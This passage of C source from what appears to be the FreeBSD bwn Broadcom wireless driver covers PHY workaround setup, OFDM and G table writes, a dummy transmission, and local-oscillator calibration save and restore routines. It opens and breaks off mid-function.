bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3_R1, 3, 28); } else { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3, 0, 0); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3, 1, 7); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3, 2, 16); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC3, 3, 28); } if (phy->rev >= 6) { BWN_PHY_MASK(mac, BWN_PHY_OFDM(0x26), ~0x0003); BWN_PHY_MASK(mac, BWN_PHY_OFDM(0x26), ~0x1000); } BWN_PHY_READ(mac, BWN_PHY_VERSION_OFDM); } static void bwn_wa_grev1(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; int i; static const uint16_t bwn_tab_finefreqg[] = BWN_TAB_FINEFREQ_G; static const uint32_t bwn_tab_retard[] = BWN_TAB_RETARD; static const uint32_t bwn_tab_rotor[] = BWN_TAB_ROTOR; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s fail", __func__)); /* init CRSTHRES and ANTDWELL */ if (phy->rev == 1) { BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1_R1, 0x4f19); } else if (phy->rev == 2) { BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1, 0x1861); BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES2, 0x0271); BWN_PHY_SET(mac, BWN_PHY_ANTDWELL, 0x0800); } else { BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1, 0x0098); BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES2, 0x0070); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xc9), 0x0080); BWN_PHY_SET(mac, BWN_PHY_ANTDWELL, 0x0800); } BWN_PHY_SETMASK(mac, BWN_PHY_CRS0, ~0x03c0, 0xd000); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0x2c), 0x005a); BWN_PHY_WRITE(mac, BWN_PHY_CCKSHIFTBITS, 0x0026); /* XXX support PHY-A??? */ for (i = 0; i < N(bwn_tab_finefreqg); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_DACRFPABB, i, bwn_tab_finefreqg[i]); /* XXX support PHY-A??? */ if (phy->rev == 1) for (i = 0; i < N(bwn_tab_noise_g1); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, i, bwn_tab_noise_g1[i]); else for (i = 0; i < N(bwn_tab_noise_g2); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, i, bwn_tab_noise_g2[i]); for (i = 0; i < N(bwn_tab_rotor); i++) bwn_ofdmtab_write_4(mac, BWN_OFDMTAB_ROTOR, i, bwn_tab_rotor[i]); /* XXX support PHY-A??? */ if (phy->rev >= 6) { if (BWN_PHY_READ(mac, BWN_PHY_ENCORE) & BWN_PHY_ENCORE_EN) bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g3); else bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g2); } else bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g1); for (i = 0; i < N(bwn_tab_retard); i++) bwn_ofdmtab_write_4(mac, BWN_OFDMTAB_ADVRETARD, i, bwn_tab_retard[i]); if (phy->rev == 1) { for (i = 0; i < 16; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_WRSSI_R1, i, 0x0020); } else { for (i = 0; i < 32; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_WRSSI, i, 0x0820); } bwn_wa_agc(mac); } static void bwn_wa_grev26789(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; int i; static const uint16_t bwn_tab_sigmasqr2[] = BWN_TAB_SIGMASQR2; uint16_t ofdmrev; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s fail", __func__)); bwn_gtab_write(mac, BWN_GTAB_ORIGTR, 0, 0xc480); /* init CRSTHRES and ANTDWELL */ if (phy->rev == 1) BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1_R1, 0x4f19); else if (phy->rev == 2) { BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1, 0x1861); BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES2, 0x0271); BWN_PHY_SET(mac, BWN_PHY_ANTDWELL, 0x0800); } else { BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES1, 0x0098); BWN_PHY_WRITE(mac, BWN_PHY_CRSTHRES2, 0x0070); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xc9), 0x0080); BWN_PHY_SET(mac, BWN_PHY_ANTDWELL, 0x0800); } for (i = 0; i < 64; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_RSSI, i, i); /* XXX support PHY-A??? */ if (phy->rev == 1) for (i = 0; i < N(bwn_tab_noise_g1); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, i, bwn_tab_noise_g1[i]); else for (i = 0; i < N(bwn_tab_noise_g2); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_AGC2, i, bwn_tab_noise_g2[i]); /* XXX support PHY-A??? */ if (phy->rev >= 6) { if (BWN_PHY_READ(mac, BWN_PHY_ENCORE) & BWN_PHY_ENCORE_EN) bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g3); else bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g2); } else bwn_wa_write_noisescale(mac, bwn_tab_noisescale_g1); for (i = 0; i < N(bwn_tab_sigmasqr2); i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_MINSIGSQ, i, bwn_tab_sigmasqr2[i]); if (phy->rev == 1) { for (i = 0; i < 16; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_WRSSI_R1, i, 0x0020); } else { for (i = 0; i < 32; i++) bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_WRSSI, i, 0x0820); } bwn_wa_agc(mac); ofdmrev = BWN_PHY_READ(mac, BWN_PHY_VERSION_OFDM) & BWN_PHYVER_VERSION; if (ofdmrev > 2) { if (phy->type == BWN_PHYTYPE_A) BWN_PHY_WRITE(mac, BWN_PHY_PWRDOWN, 0x1808); else BWN_PHY_WRITE(mac, BWN_PHY_PWRDOWN, 0x1000); } else { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_DAC, 3, 0x1044); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_DAC, 4, 0x7201); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_DAC, 6, 0x0040); } bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_UNKNOWN_0F, 2, 15); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_UNKNOWN_0F, 3, 20); } static void bwn_wa_init(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s fail", __func__)); switch (phy->rev) { case 1: bwn_wa_grev1(mac); break; case 2: case 6: case 7: case 8: case 9: bwn_wa_grev26789(mac); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } if (siba_get_pci_subvendor(sc->sc_dev) != SIBA_BOARDVENDOR_BCM || siba_get_pci_subdevice(sc->sc_dev) != SIBA_BOARD_BU4306 || siba_get_pci_revid(sc->sc_dev) != 0x17) { if (phy->rev < 2) { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX_R1, 1, 0x0002); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX_R1, 2, 0x0001); } else { bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 1, 0x0002); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 2, 0x0001); if ((siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA) && (phy->rev >= 7)) { BWN_PHY_MASK(mac, BWN_PHY_EXTG(0x11), 0xf7ff); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0020, 0x0001); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0021, 0x0001); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0022, 0x0001); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0023, 0x0000); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0000, 0x0000); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_GAINX, 0x0003, 0x0002); } } } if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_FEM) { BWN_PHY_WRITE(mac, BWN_PHY_GTABCTL, 0x3120); BWN_PHY_WRITE(mac, BWN_PHY_GTABDATA, 0xc480); } bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_UNKNOWN_11, 0, 0); bwn_ofdmtab_write_2(mac, BWN_OFDMTAB_UNKNOWN_11, 1, 0); } static void bwn_ofdmtab_write_2(struct bwn_mac *mac, uint16_t table, uint16_t offset, uint16_t value) { struct bwn_phy_g *pg = &mac->mac_phy.phy_g; uint16_t addr; addr = table + offset; if ((pg->pg_ofdmtab_dir != BWN_OFDMTAB_DIR_WRITE) || (addr - 1 != pg->pg_ofdmtab_addr)) { BWN_PHY_WRITE(mac, BWN_PHY_OTABLECTL, addr); pg->pg_ofdmtab_dir = BWN_OFDMTAB_DIR_WRITE; } pg->pg_ofdmtab_addr = addr; BWN_PHY_WRITE(mac, BWN_PHY_OTABLEI, value); } static void bwn_ofdmtab_write_4(struct bwn_mac *mac, uint16_t table, uint16_t offset, uint32_t value) { struct bwn_phy_g *pg = &mac->mac_phy.phy_g; uint16_t addr; addr = table + offset; if ((pg->pg_ofdmtab_dir != BWN_OFDMTAB_DIR_WRITE) || (addr - 1 != pg->pg_ofdmtab_addr)) { BWN_PHY_WRITE(mac, BWN_PHY_OTABLECTL, addr); pg->pg_ofdmtab_dir = BWN_OFDMTAB_DIR_WRITE; } pg->pg_ofdmtab_addr = addr; BWN_PHY_WRITE(mac, BWN_PHY_OTABLEI, value); BWN_PHY_WRITE(mac, BWN_PHY_OTABLEQ, (value >> 16)); } static void bwn_gtab_write(struct bwn_mac *mac, uint16_t table, uint16_t offset, uint16_t value) { BWN_PHY_WRITE(mac, BWN_PHY_GTABCTL, table + offset); BWN_PHY_WRITE(mac, BWN_PHY_GTABDATA, value); } static void bwn_dummy_transmission(struct bwn_mac *mac, int ofdm, int paon) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; unsigned int i, max_loop; uint16_t value; uint32_t buffer[5] = { 0x00000000, 0x00d40000, 0x00000000, 0x01000000, 0x00000000 }; if (ofdm) { max_loop = 0x1e; buffer[0] = 0x000201cc; } else { max_loop = 0xfa; buffer[0] = 0x000b846e; } BWN_ASSERT_LOCKED(mac->mac_sc); for (i = 0; i < 5; i++) bwn_ram_write(mac, i * 4, buffer[i]); BWN_WRITE_2(mac, 0x0568, 0x0000); BWN_WRITE_2(mac, 0x07c0, (siba_get_revid(sc->sc_dev) < 11) ? 0x0000 : 0x0100); value = ((phy->type == BWN_PHYTYPE_A) ? 0x41 : 0x40); BWN_WRITE_2(mac, 0x050c, value); if (phy->type == BWN_PHYTYPE_LP) BWN_WRITE_2(mac, 0x0514, 0x1a02); BWN_WRITE_2(mac, 0x0508, 0x0000); BWN_WRITE_2(mac, 0x050a, 0x0000); BWN_WRITE_2(mac, 0x054c, 0x0000); BWN_WRITE_2(mac, 0x056a, 0x0014); BWN_WRITE_2(mac, 0x0568, 0x0826); BWN_WRITE_2(mac, 0x0500, 0x0000); if (phy->type == BWN_PHYTYPE_LP) BWN_WRITE_2(mac, 0x0502, 0x0050); else BWN_WRITE_2(mac, 0x0502, 0x0030); if (phy->rf_ver == 0x2050 && phy->rf_rev <= 0x5) BWN_RF_WRITE(mac, 0x0051, 0x0017); for (i = 0x00; i < max_loop; i++) { value = BWN_READ_2(mac, 0x050e); if (value & 0x0080) break; DELAY(10); } for (i = 0x00; i < 0x0a; i++) { value = BWN_READ_2(mac, 0x050e); if (value & 0x0400) break; DELAY(10); } for (i = 0x00; i < 0x19; i++) { value = BWN_READ_2(mac, 0x0690); if (!(value & 0x0100)) break; DELAY(10); } if (phy->rf_ver == 0x2050 && phy->rf_rev <= 0x5) BWN_RF_WRITE(mac, 0x0051, 0x0037); } static void bwn_ram_write(struct bwn_mac *mac, uint16_t offset, uint32_t val) { uint32_t macctl; KASSERT(offset % 4 == 0, ("%s:%d: fail", __func__, __LINE__)); macctl = BWN_READ_4(mac, BWN_MACCTL); if (macctl & BWN_MACCTL_BIGENDIAN) printf("TODO: need swap\n"); BWN_WRITE_4(mac, BWN_RAM_CONTROL, offset); BWN_BARRIER(mac, BUS_SPACE_BARRIER_WRITE); BWN_WRITE_4(mac, BWN_RAM_DATA, val); } static void bwn_lo_write(struct bwn_mac *mac, struct bwn_loctl *ctl) { uint16_t value; KASSERT(mac->mac_phy.type == BWN_PHYTYPE_G, ("%s:%d: fail", __func__, __LINE__)); value = (uint8_t) (ctl->q); value |= ((uint8_t) (ctl->i)) << 8; BWN_PHY_WRITE(mac, BWN_PHY_LO_CTL, value); } static uint16_t bwn_lo_calcfeed(struct bwn_mac *mac, uint16_t lna, uint16_t pga, uint16_t trsw_rx) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; uint16_t rfover; uint16_t feedthrough; if (phy->gmode) { lna <<= BWN_PHY_RFOVERVAL_LNA_SHIFT; pga <<= BWN_PHY_RFOVERVAL_PGA_SHIFT; KASSERT((lna & ~BWN_PHY_RFOVERVAL_LNA) == 0, ("%s:%d: fail", __func__, __LINE__)); KASSERT((pga & ~BWN_PHY_RFOVERVAL_PGA) == 0, ("%s:%d: fail", __func__, __LINE__)); trsw_rx &= (BWN_PHY_RFOVERVAL_TRSWRX | BWN_PHY_RFOVERVAL_BW); rfover = BWN_PHY_RFOVERVAL_UNK | pga | lna | trsw_rx; if ((siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA) && phy->rev > 6) rfover |= BWN_PHY_RFOVERVAL_EXTLNA; BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xe300); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, rfover); DELAY(10); rfover |= BWN_PHY_RFOVERVAL_BW_LBW; BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, rfover); DELAY(10); rfover |= BWN_PHY_RFOVERVAL_BW_LPF; BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, rfover); DELAY(10); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xf300); } else { pga |= BWN_PHY_PGACTL_UNKNOWN; BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, pga); DELAY(10); pga |= BWN_PHY_PGACTL_LOWBANDW; BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, pga); DELAY(10); pga |= BWN_PHY_PGACTL_LPF; BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, pga); } DELAY(21); feedthrough = BWN_PHY_READ(mac, BWN_PHY_LO_LEAKAGE); return (feedthrough); } static uint16_t bwn_lo_txctl_regtable(struct bwn_mac *mac, uint16_t *value, uint16_t *pad_mix_gain) { struct bwn_phy *phy = &mac->mac_phy; uint16_t reg, v, padmix; if (phy->type == BWN_PHYTYPE_B) { v = 0x30; if (phy->rf_rev <= 5) { reg = 0x43; padmix = 0; } else { reg = 0x52; padmix = 5; } } else { if (phy->rev >= 2 && phy->rf_rev == 8) { reg = 0x43; v = 0x10; padmix = 2; } else { reg = 0x52; v = 0x30; padmix = 5; } } if (value) *value = v; if (pad_mix_gain) *pad_mix_gain = padmix; return (reg); } static void bwn_lo_measure_txctl_values(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; uint16_t reg, mask; uint16_t trsw_rx, pga; uint16_t rf_pctl_reg; static const uint8_t tx_bias_values[] = { 0x09, 0x08, 0x0a, 0x01, 0x00, 0x02, 0x05, 0x04, 0x06, }; static const uint8_t tx_magn_values[] = { 0x70, 0x40, }; if (!BWN_HAS_LOOPBACK(phy)) { rf_pctl_reg = 6; trsw_rx = 2; pga = 0; } else { int lb_gain; trsw_rx = 0; lb_gain = pg->pg_max_lb_gain / 2; if (lb_gain > 10) { rf_pctl_reg = 0; pga = abs(10 - lb_gain) / 6; pga = MIN(MAX(pga, 0), 15); } else { int cmp_val; int tmp; pga = 0; cmp_val = 0x24; if ((phy->rev >= 2) && (phy->rf_ver == 0x2050) && (phy->rf_rev == 8)) cmp_val = 0x3c; tmp = lb_gain; if ((10 - lb_gain) < cmp_val) tmp = (10 - lb_gain); if (tmp < 0) tmp += 6; else tmp += 3; cmp_val /= 4; tmp /= 4; if (tmp >= cmp_val) rf_pctl_reg = cmp_val; else rf_pctl_reg = tmp; } } BWN_RF_SETMASK(mac, 0x43, 0xfff0, rf_pctl_reg); bwn_phy_g_set_bbatt(mac, 2); reg = bwn_lo_txctl_regtable(mac, &mask, NULL); mask = ~mask; BWN_RF_MASK(mac, reg, mask); if (BWN_HAS_TXMAG(phy)) { int i, j; int feedthrough; int min_feedth = 0xffff; uint8_t tx_magn, tx_bias; for (i = 0; i < N(tx_magn_values); i++) { tx_magn = tx_magn_values[i]; BWN_RF_SETMASK(mac, 0x52, 0xff0f, tx_magn); for (j = 0; j < N(tx_bias_values); j++) { tx_bias = tx_bias_values[j]; BWN_RF_SETMASK(mac, 0x52, 0xfff0, tx_bias); feedthrough = bwn_lo_calcfeed(mac, 0, pga, trsw_rx); if (feedthrough < min_feedth) { lo->tx_bias = tx_bias; lo->tx_magn = tx_magn; min_feedth = feedthrough; } if (lo->tx_bias == 0) break; } BWN_RF_WRITE(mac, 0x52, (BWN_RF_READ(mac, 0x52) & 0xff00) | lo->tx_bias | lo-> tx_magn); } } else { lo->tx_magn = 0; lo->tx_bias = 0; BWN_RF_MASK(mac, 0x52, 0xfff0); } BWN_GETTIME(lo->txctl_measured_time); } static void bwn_lo_get_powervector(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; int i; uint64_t tmp; uint64_t power_vector = 0; for (i = 0; i < 8; i += 2) { tmp = bwn_shm_read_2(mac, BWN_SHARED, 0x310 + i); power_vector |= (tmp << (i * 8)); bwn_shm_write_2(mac, BWN_SHARED, 0x310 + i, 0); } if (power_vector) lo->power_vector = power_vector; BWN_GETTIME(lo->pwr_vec_read_time); } static void bwn_lo_measure_gain_values(struct bwn_mac *mac, int16_t max_rx_gain, int use_trsw_rx) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; uint16_t tmp; if (max_rx_gain < 0) max_rx_gain = 0; if (BWN_HAS_LOOPBACK(phy)) { int trsw_rx = 0; int trsw_rx_gain; if (use_trsw_rx) { trsw_rx_gain = pg->pg_trsw_rx_gain / 2; if (max_rx_gain >= trsw_rx_gain) { trsw_rx_gain = max_rx_gain - trsw_rx_gain; trsw_rx = 0x20; } } else trsw_rx_gain = max_rx_gain; if (trsw_rx_gain < 9) { pg->pg_lna_lod_gain = 0; } else { pg->pg_lna_lod_gain = 1; trsw_rx_gain -= 8; } trsw_rx_gain = MIN(MAX(trsw_rx_gain, 0), 0x2d); pg->pg_pga_gain = trsw_rx_gain / 3; if (pg->pg_pga_gain >= 5) { pg->pg_pga_gain -= 5; pg->pg_lna_gain = 2; } else pg->pg_lna_gain = 0; } else { pg->pg_lna_gain = 0; pg->pg_trsw_rx_gain = 0x20; if (max_rx_gain >= 0x14) { pg->pg_lna_lod_gain = 1; pg->pg_pga_gain = 2; } else if (max_rx_gain >= 0x12) { pg->pg_lna_lod_gain = 1; pg->pg_pga_gain = 1; } else if (max_rx_gain >= 0xf) { pg->pg_lna_lod_gain = 1; pg->pg_pga_gain = 0; } else { pg->pg_lna_lod_gain = 0; pg->pg_pga_gain = 0; } } tmp = BWN_RF_READ(mac, 0x7a); if (pg->pg_lna_lod_gain == 0) tmp &= ~0x0008; else tmp |= 0x0008; BWN_RF_WRITE(mac, 0x7a, tmp); } static void bwn_lo_save(struct bwn_mac *mac, struct bwn_lo_g_value *sav) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; struct timespec ts; uint16_t tmp; if (bwn_has_hwpctl(mac)) { sav->phy_lomask = BWN_PHY_READ(mac, BWN_PHY_LO_MASK); sav->phy_extg = BWN_PHY_READ(mac, BWN_PHY_EXTG(0x01)); sav->phy_dacctl_hwpctl = BWN_PHY_READ(mac, BWN_PHY_DACCTL); sav->phy_cck4 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x14)); sav->phy_hpwr_tssictl = BWN_PHY_READ(mac, BWN_PHY_HPWR_TSSICTL); BWN_PHY_SET(mac, BWN_PHY_HPWR_TSSICTL, 0x100); BWN_PHY_SET(mac, BWN_PHY_EXTG(0x01), 0x40); BWN_PHY_SET(mac, BWN_PHY_DACCTL, 0x40); BWN_PHY_SET(mac, BWN_PHY_CCK(0x14), 0x200); } if (phy->type == BWN_PHYTYPE_B && phy->rf_ver == 0x2050 && phy->rf_rev < 6) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x16), 0x410); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x17), 0x820); } if (phy->rev >= 2) { sav->phy_analogover = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVER); sav->phy_analogoverval = BWN_PHY_READ(mac, BWN_PHY_ANALOGOVERVAL); sav->phy_rfover = BWN_PHY_READ(mac, BWN_PHY_RFOVER); sav->phy_rfoverval = BWN_PHY_READ(mac, BWN_PHY_RFOVERVAL); sav->phy_classctl = BWN_PHY_READ(mac, BWN_PHY_CLASSCTL); sav->phy_cck3 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x3e)); sav->phy_crs0 = BWN_PHY_READ(mac, BWN_PHY_CRS0); BWN_PHY_MASK(mac, BWN_PHY_CLASSCTL, 0xfffc); BWN_PHY_MASK(mac, BWN_PHY_CRS0, 0x7fff); BWN_PHY_SET(mac, BWN_PHY_ANALOGOVER, 0x0003); BWN_PHY_MASK(mac, BWN_PHY_ANALOGOVERVAL, 0xfffc); if (phy->type == BWN_PHYTYPE_G) { if ((phy->rev >= 7) && (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA)) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, 0x933); } else { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, 0x133); } } else { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, 0); } BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x3e), 0); } sav->reg0 = BWN_READ_2(mac, 0x3f4); sav->reg1 = BWN_READ_2(mac, 0x3e2); sav->rf0 = BWN_RF_READ(mac, 0x43); sav->rf1 = BWN_RF_READ(mac, 0x7a); sav->phy_pgactl = BWN_PHY_READ(mac, BWN_PHY_PGACTL); sav->phy_cck2 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x2a)); sav->phy_syncctl = BWN_PHY_READ(mac, BWN_PHY_SYNCCTL); sav->phy_dacctl = BWN_PHY_READ(mac, BWN_PHY_DACCTL); if (!BWN_HAS_TXMAG(phy)) { sav->rf2 = BWN_RF_READ(mac, 0x52); sav->rf2 &= 0x00f0; } if (phy->type == BWN_PHYTYPE_B) { sav->phy_cck0 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x30)); sav->phy_cck1 = BWN_PHY_READ(mac, BWN_PHY_CCK(0x06)); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x30), 0x00ff); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x06), 0x3f3f); } else { BWN_WRITE_2(mac, 0x3e2, BWN_READ_2(mac, 0x3e2) | 0x8000); } BWN_WRITE_2(mac, 0x3f4, BWN_READ_2(mac, 0x3f4) & 0xf000); tmp = (phy->type == BWN_PHYTYPE_G) ? BWN_PHY_LO_MASK : BWN_PHY_CCK(0x2e); BWN_PHY_WRITE(mac, tmp, 0x007f); tmp = sav->phy_syncctl; BWN_PHY_WRITE(mac, BWN_PHY_SYNCCTL, tmp & 0xff7f); tmp = sav->rf1; BWN_RF_WRITE(mac, 0x007a, tmp & 0xfff0); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2a), 0x8a3); if (phy->type == BWN_PHYTYPE_G || (phy->type == BWN_PHYTYPE_B && phy->rf_ver == 0x2050 && phy->rf_rev >= 6)) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2b), 0x1003); } else BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2b), 0x0802); if (phy->rev >= 2) bwn_dummy_transmission(mac, 0, 1); bwn_phy_g_switch_chan(mac, 6, 0); BWN_RF_READ(mac, 0x51); if (phy->type == BWN_PHYTYPE_G) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2f), 0); nanouptime(&ts); if (time_before(lo->txctl_measured_time, (ts.tv_nsec / 1000000 + ts.tv_sec * 1000) - BWN_LO_TXCTL_EXPIRE)) bwn_lo_measure_txctl_values(mac); if (phy->type == BWN_PHYTYPE_G && phy->rev >= 3) BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0xc078); else { if (phy->type == BWN_PHYTYPE_B) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2e), 0x8078); else BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, 0x8078); } } static void bwn_lo_restore(struct bwn_mac *mac, struct bwn_lo_g_value *sav) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; uint16_t tmp; if (phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, 0xe300); tmp = (pg->pg_pga_gain << 8); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, tmp | 0xa0); DELAY(5); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, tmp | 0xa2); DELAY(2); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, tmp | 0xa3); } else { tmp = (pg->pg_pga_gain | 0xefa0); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, tmp); } if (phy->type == BWN_PHYTYPE_G) { if (phy->rev >= 3) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2e), 0xc078); else BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2e), 0x8078); if (phy->rev >= 2) BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2f), 0x0202); else BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2f), 0x0101); } BWN_WRITE_2(mac, 0x3f4, sav->reg0); BWN_PHY_WRITE(mac, BWN_PHY_PGACTL, sav->phy_pgactl); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x2a), sav->phy_cck2); BWN_PHY_WRITE(mac, BWN_PHY_SYNCCTL, sav->phy_syncctl); BWN_PHY_WRITE(mac, BWN_PHY_DACCTL, sav->phy_dacctl); BWN_RF_WRITE(mac, 0x43, sav->rf0); BWN_RF_WRITE(mac, 0x7a, sav->rf1); if (!BWN_HAS_TXMAG(phy)) { tmp = sav->rf2; BWN_RF_SETMASK(mac, 0x52, 0xff0f, tmp); } BWN_WRITE_2(mac, 0x3e2, sav->reg1); if (phy->type == BWN_PHYTYPE_B && phy->rf_ver == 0x2050 && phy->rf_rev <= 5) { BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x30), sav->phy_cck0); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x06), sav->phy_cck1); } if (phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVER, sav->phy_analogover); BWN_PHY_WRITE(mac, BWN_PHY_ANALOGOVERVAL, sav->phy_analogoverval); BWN_PHY_WRITE(mac, BWN_PHY_CLASSCTL, sav->phy_classctl); BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, sav->phy_rfover); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, sav->phy_rfoverval); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x3e), sav->phy_cck3); BWN_PHY_WRITE(mac, BWN_PHY_CRS0, sav->phy_crs0); } if (bwn_has_hwpctl(mac)) { tmp = (sav->phy_lomask & 0xbfff); BWN_PHY_WRITE(mac, BWN_PHY_LO_MASK, tmp); BWN_PHY_WRITE(mac, BWN_PHY_EXTG(0x01), sav->phy_extg); BWN_PHY_WRITE(mac, BWN_PHY_DACCTL, sav->phy_dacctl_hwpctl); BWN_PHY_WRITE(mac, BWN_PHY_CCK(0x14), sav->phy_cck4); BWN_PHY_WRITE(mac, BWN_PHY_HPWR_TSSICTL, sav->phy_hpwr_tssictl); } bwn_phy_g_switch_chan(mac, sav->old_channel, 1); } static int bwn_lo_probe_loctl(struct bwn_mac *mac, struct bwn_loctl *probe, struct bwn_lo_g_sm *d) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_loctl orig, test; struct bwn_loctl prev = { -100, -100 }; static const struct bwn_loctl modifiers[] = { { 1, 1,}, { 1, 0,}, { 1, -1,}, { 0, -1,}, { -1, -1,}, { -1, 0,}, { -1, 1,}, { 0, 1,} }; int begin, end, lower = 0, i; uint16_t feedth; if (d->curstate == 0) { begin = 1; end = 8; } else if (d->curstate % 2 == 0) { begin = d->curstate - 1; end = d->curstate + 1; } else { begin = d->curstate - 2; end = d->curstate + 2; } if (begin < 1) begin += 8; if (end > 8) end -= 8; memcpy(&orig, probe, 